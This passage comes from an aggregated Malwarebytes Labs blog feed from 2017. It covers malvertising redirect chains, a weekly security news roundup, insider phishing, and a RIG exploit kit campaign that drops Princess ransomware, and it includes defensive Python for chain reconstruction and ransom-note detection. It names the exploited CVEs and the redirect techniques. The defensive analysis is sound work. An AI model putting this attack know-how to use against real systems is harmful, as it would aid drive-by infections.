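     {"Location": "https://www.alrtsyscalling[.]cf/PLACEHOLDER-LANDING"}, ""),
]

if __name__ == "__main__":
    for label, capture in (("RIG EK", RIG_CAPTURE), ("TSS", TSS_CAPTURE)):
        print(label)
        for src, mech, dst, hidden in reconstruct_chain(capture):
            print(f"  {src} -> {dst} via {mech}" + ("  [referrer hidden]" if hidden else ""))
```

The per-hop mechanism is what makes this useful beyond a list of domains: an HTTP 302 is visible in a proxy log, but a location.href assignment or an injected iframe is only visible in the body, so a detection pipeline that records just status codes and Location headers misses most of these hops.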

Traffic and user targeting

These days it seems irrelevant how malicious actors get their leads, so long as those leads are genuine users who can be exposed to malware or scams. An advantage of using ad networks and malvertising is that much of the visitor filtering can be handled throughout the distribution chain with remarkable efficiency, compared to server-side checks on compromised sites.

Parked domains are one of many ways of hijacking traffic and monetizing it. While those practices raise eyebrows, are they actually illegal? Is it something that domain name registrars should enforce or ban? Those are interesting questions worth debating.

Malwarebytes blocks a lot of domains associated with malvertising as well as drive-by download attempts. Because we are witnessing more and more social engineering attacks, we highly recommend you spread the word about one of the most common scams today, the tech support scam.

The post Expired domain names and malvertising appeared first on Malwarebytes Labs.


A week in security (August 28 – September 3)

Malware Bytes Security - Mon, 09/04/2017 - 1:00pm

Last week, we looked at what actions Kronos can perform in the final installment of a two-part post. We also dove into Locky again, a ransomware that just made a comeback, and found that its latest variant (as of this writing) has anti-sandboxing capabilities. This means that once Locky has determined that it is running in a virtual machine, it will not perform to its full functionality.

Our researchers also talked about a new 419 spam, malware vaccination tricks, malvertising, and insider threats.

Lastly, Senior Security Researcher Jérôme Segura uncovered a new RIG exploit kit campaign that drops the PrincessLocker ransomware via drive-by download.

Mobile Menace Monday: Implications of Google Play Protect

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers
  • Scammers Already Taking Advantage Of Hurricane Harvey, Registering Domains. “The Better Business Bureau said it has already seen sketchy crowdfunding efforts and expects the coming months to see the usual flood of ‘storm chasers’ — ranging from legitimate contractors looking for business to scammers attempting to take advantage of those who’ve already been victimized by the storm. In addition, US-CERT is warning users ‘to remain vigilant for malicious cyber activity seeking to capitalize on interest in Hurricane Harvey.’” (Source: Cyber in Sight)
  • IRS Warns of Emails Spreading Ransomware. “The Internal Revenue Service (IRS) is warning US citizens of a new phishing scheme that poses as official IRS communications in the hopes that victims access a link, download a file, and hopefully get infected with ransomware.” (Source: Bleeping Computer)
  • USB Malware Implicated in Fileless Attacks. “In early August we discussed a case where a backdoor was being installed filelessly onto a target system using a script that abused various legitimate functions. At the time, we did not know how the threat arrived onto the target machine. We speculated that it was either downloaded by users or dropped by other malware. We recently learned the exact arrival method of this backdoor. As it turned out, we were wrong: it was neither dropped nor downloaded. Instead, it arrived via USB flash disks.” (Source: Trend Micro’s TrendLabs Security Intelligence Blog)
  • FDA Approves Firmware Fix for St Jude Pacemakers. “Abbott-owned St Jude Medical was at the center of a legal storm last year after suing security firm MedSec and short seller Muddy Waters for publishing what it claimed to be false info about bugs in its equipment. It argued this strategy helped them make money off the stock market when shares in St Jude inevitably fell on the news. However, since then the firm has been forced to address some of the issues highlighted by MedSec by releasing security fixes for some products, as it did in January.” (Source: InfoSecurity Magazine)
  • Attackers Exploited Instagram API Bug To Access Users’ Contact Info. “Instagram has confirmed that ‘one or more individuals obtained unlawful access to a number of high-profile Instagram users’ contact information — specifically email address and phone number — by exploiting a bug in an Instagram API.’ Apparently, no account passwords were exposed.” (Source: Help Net Security)
  • Phishing Emails Undetected by 97 Percent of People. “Today, phishing emails are behind 97 percent of cyber attacks, yet recent research reveals 97 percent of people cannot identify those phishing scams, putting the companies they work for at risk. In fact, out of 5,000 emails, one of them is likely to be a phishing email that causes damage. Victims may not know they’ve become one for up to a year.” (Source: Inside Counsel)
  • New Authentication Methods Help Companies To Ditch Passwords. “Most people now recognize that passwords alone are flawed as a means of securing systems. The problem is that there are lots of options when it comes to finding a better way of doing things. Access control specialist SecureAuth is helping the move towards a passwordless world with the introduction of additional multi-factor authentication (MFA) methods, including Link-to-Accept via SMS or email, and YubiKey, the FIDO Universal Second-Factor (U2F) security key by Yubico.” (Source: Beta News)
Latest updates for Businesses
  • Strains Of Mutant Malware Increasingly Evading Anti-Virus To Rob Bank Accounts, Says Akouto. “An analysis of recent attacks finds a sharp increase in the use of new strains of malware capable of bypassing traditional anti-virus according to cybersecurity experts from Akouto. The majority of the analyzed attacks aimed to harvest confidential information and steal money through online banking fraud.” (Source: Payment Week)
  • Ransomware is Going More Corporate, Less Consumer. “Ransomware deployed as worms tends to hit companies far harder than consumers, given that malicious malware can shoot through corporate networks with great speed. Consumers, on the other hand, are usually not connected to a network. As a result, WannaCry and Petya helped push corporations to account for 42% of all ransomware incidents in the first half of the year, compared to 30% of ransomware incidents for all of last year and 29% in 2015, according to the report.” (Source: Dark Reading)
  • SMBs Beware! This Is How Automated Software Updates Spread Malware. “You’re surfing the web, and suddenly a pop-up appears asking you to update a piece of software on your computer. Today, we should all be canny enough to hesitate before clicking ‘install’. We know that there is a good chance that this is malware and that what we will be downloading could put the future of our business at risk. However, what happens when we’re not given a choice? Can we always trust the seemingly routine automatic updates our computers receive, even when their certificate seems to be OK? The answer is no.” (Source: Computing.Co.UK)
  • Hacking Retail Gift Cards Remains Scarily Easy. “After years of examining the retail gift card industry following that initial discovery, Caput plans to present his findings at the Toorcon hacker conference this weekend. They include all-too-simple tricks that hackers can use to determine gift card numbers and drain money from them, even before the legitimate holder of the card ever has a chance to use them. While some of those methods have been semi-public for years, and some retailers have fixed their security flaws, a disturbing fraction of targets remain wide open to gift card hacking schemes, Caput says. And as analysis of the recently defunct dark web marketplace AlphaBay shows, actual criminals have made prolific use of those schemes too.” (Source: Wired)
  • Payment security: What are the biggest challenges? “With cybercrime on the increase, payment card security is increasingly a focus for companies and consumers alike. The Payment Card Industry Data Security Standard (PCI DSS) is there to help businesses that take card payments protect their payment systems from breaches and theft of cardholder data. The findings from the Verizon 2017 Payment Security Report (2017 PSR) demonstrate a link between organizations being compliant with the standard, and their ability to defend themselves against cyberattacks.” (Source: Help Net Security)

Safe surfing, everyone!


The Malwarebytes Labs Team

The post A week in security (August 28 – September 3) appeared first on Malwarebytes Labs.


Insider threats in your work inbox

Malware Bytes Security - Fri, 09/01/2017 - 12:52pm

Recently, our friends at Barracuda found a new phishing campaign that banks on the popularity of cloud services used in most businesses, such as Microsoft Office 365.

According to their blog post, this latest scheme takes advantage of the natural trust employees place in messages they receive from colleagues using the correct email address. Dear reader, this campaign goes beyond impostor email or business email compromise (BEC). Barracuda is calling it the ‘new insider threat.’

BEC phishing campaigns usually originate outside the target organization. The threat actor creates an email address that looks like the real thing, just like what we’ve seen here, and then uses it to convince someone in the organization to wire money their way. If a threat actor successfully infiltrates an organization’s cloud email platform, the threat becomes something else: the threat actor is now an identity thief and an insider, the biggest threat to any organization. At that point, the possibilities for abuse are endless.

Businesses can combat this new attack through continuous education and awareness efforts. It also pays to add multifactor authentication, giving employees additional ways to verify their identities before they are allowed to access their work email.


The Malwarebytes Labs Team

The post Insider threats in your work inbox appeared first on Malwarebytes Labs.


RIG exploit kit distributes Princess Ransomware

Malware Bytes Security - Thu, 08/31/2017 - 4:04pm

We have identified a new drive-by download campaign that distributes the Princess Ransomware, leveraging compromised websites and the RIG exploit kit. This is somewhat of a change for those tracking malvertising campaigns and their payloads.

We had analyzed the Princess Ransomware last November and pointed out that, despite similarities with Cerber’s onion page, the actual code was quite different. A new payment page appeared to have surfaced in underground forums and is now being used in attacks in the wild.

From hacked site to RIG EK

We are not so accustomed to witnessing compromised websites pushing exploit kits these days. Indeed, some campaigns have been replaced with tech support scams, and overall most drive-by activity comes from legitimate publishers and malvertising.

Yet here we observed an iframe injection that redirected from the hacked site to a temporary gate, distinct from the well-known “Seamless gate” that has been dropping copious amounts of the Ramnit Trojan.

The final call to the RIG exploit kit landing page is made via a standard 302 redirect; the landing page then attempts to exploit one of several Internet Explorer (CVE-2013-2551, CVE-2014-6332, CVE-2015-2419, CVE-2016-0189) or Flash Player (CVE-2015-8651) vulnerabilities.

Princess Ransomware

Once the exploitation phase is successful, RIG downloads and runs the Princess Ransomware. The infected user will notice that their files have been encrypted and carry a new extension. The ransom note is called _USE_TO_REPAIR_[a-zA-Z0-9].html, where [a-zA-Z0-9] is an identifier.

The payment page can be accessed via several provided links, including a ‘.onion’ one. Attackers are asking for 0.0770 BTC, which is about $367 at the time of writing.
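As an added detection example (not code from the post or from Malwarebytes), the following Python walks a directory tree, flags files matching the ransom-note naming pattern described above, and counts file extensions so that a sudden run of an unfamiliar extension across many folders stands out. The sample tree is constructed in a temporary directory; the .q1z8 extension and the a7Kx9 note identifier are placeholders, since the post does not name the extension Princess appends or a real identifier.

```python
import os
import re
import tempfile
from collections import Counter

# Ransom note name pattern from the post: _USE_TO_REPAIR_<id>.html with an alphanumeric <id>.
NOTE_RE = re.compile(r"^_USE_TO_REPAIR_[A-Za-z0-9]+\.html$")

# Extensions expected on a typical workstation share (constructed baseline for the demo).
KNOWN_EXTENSIONS = {".docx", ".xlsx", ".pdf", ".jpg", ".png", ".txt", ".html"}


def scan_tree(root):
    """Walk root and return (note_paths, extension_counts): ransom-note paths relative
    to root, plus a Counter of lowercase extensions for every other file."""
    notes = []
    ext_counts = Counter()
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if NOTE_RE.match(name):
                notes.append(os.path.relpath(os.path.join(dirpath, name), root))
                continue
            ext = os.path.splitext(name)[1].lower()
            if ext:
                ext_counts[ext] += 1
    return notes, ext_counts


def unexpected_extensions(ext_counts, known=KNOWN_EXTENSIONS):
    """Extensions outside the baseline; many files sharing one such extension is the
    'new extension' symptom the post describes."""
    return {ext: n for ext, n in ext_counts.items() if ext not in known}


def assess(root):
    """Summarize a scan: note count, directories holding a note, and odd extensions."""
    notes, counts = scan_tree(root)
    note_dirs = sorted({os.path.dirname(p) for p in notes})
    return {"notes": len(notes), "note_dirs": note_dirs, "unexpected": unexpected_extensions(counts)}


def build_constructed_tree():
    """Create a throwaway directory that looks like a partially encrypted share.
    '.q1z8' is a placeholder extension, not one Princess is known to use."""
    root = tempfile.mkdtemp(prefix="princess_demo_")
    layout = {
        "docs": ["report.docx.q1z8", "budget.xlsx.q1z8", "_USE_TO_REPAIR_a7Kx9.html"],
        "pics": ["cat.jpg.q1z8", "_USE_TO_REPAIR_a7Kx9.html"],
        "clean": ["notes.txt", "readme.html", "USE_TO_REPAIR.html"],  # last one must NOT match
    }
    for subdir, files in layout.items():
        os.makedirs(os.path.join(root, subdir))
        for filename in files:
            with open(os.path.join(root, subdir, filename), "w") as fh:
                fh.write("constructed sample content\n")
    return root


if __name__ == "__main__":
    demo_root = build_constructed_tree()
    print(assess(demo_root))
```

Pointing scan_tree at a file share or a user profile gives a quick triage answer to the two questions that matter first after an infection: which directories were touched (where the notes landed) and how many files now carry an extension the baseline has never seen.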

Down but still kicking

The exploit kit landscape is not what it was a year ago, but it would be remiss to disregard drive-by download attacks completely. Malvertising is still thriving, and we are noticing increased activity and changes among existing threat actors and newcomers.

We will update this post with additional information about Princess Locker if there is anything noteworthy to add.

Indicators of compromise

RIG EK gate:

RIG EK IP address:

Princess Ransomware binary:


Princess Ransomware payment page:


The post RIG exploit kit distributes Princess Ransomware appeared first on Malwarebytes Labs.
